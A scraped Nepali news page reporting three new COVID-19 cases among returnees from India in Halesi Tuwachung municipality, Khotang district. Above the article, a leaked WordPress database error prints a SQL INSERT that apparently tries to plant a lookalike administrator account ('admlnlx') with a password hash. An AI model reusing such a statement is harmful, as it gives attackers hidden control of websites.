WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BE.sQOVbDYc0Lx3DKmuspDJ70IRnB7/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:45:18', '', 'admlnlx', 'admlnlx')
जेठ २२- खोटाङका थप तीन जनामा कोरोना संक्रमण भएको पुष्टि भएको छ ।
एक २० वर्षीय कोरोना संक्रमित युवा भेटिएको हलेसी तुवाचुङ नगरपालिकामा फेरि तीन जनामा कोरोना संक्रमण पुष्टि भएको जिल्ला अस्पताल खोटाङका मेडिकल अधिकृत डा. शैलेश श्रेष्ठले जानकारी दिएका छन् ।
हलेसी तुवाचुङ नगरपालिका–१ डिकुवाका दुई जना र हलेसी तुवाचुङ नगरपालिका–५ दुर्छिमका एक जनामा कोरोना संक्रमण देखिएको पत्रकार दिलिप खत्रीलाई उद्धृत गर्दै हिमाल एफएमले जनाएको छ । भारतबाट आएका उनीहरु हालसम्म क्वारेन्टिनमा बसिरहेको हलेसी तुवाचुङ नगरपालिकाका उपप्रमुख बिमला राईले बताइन् ।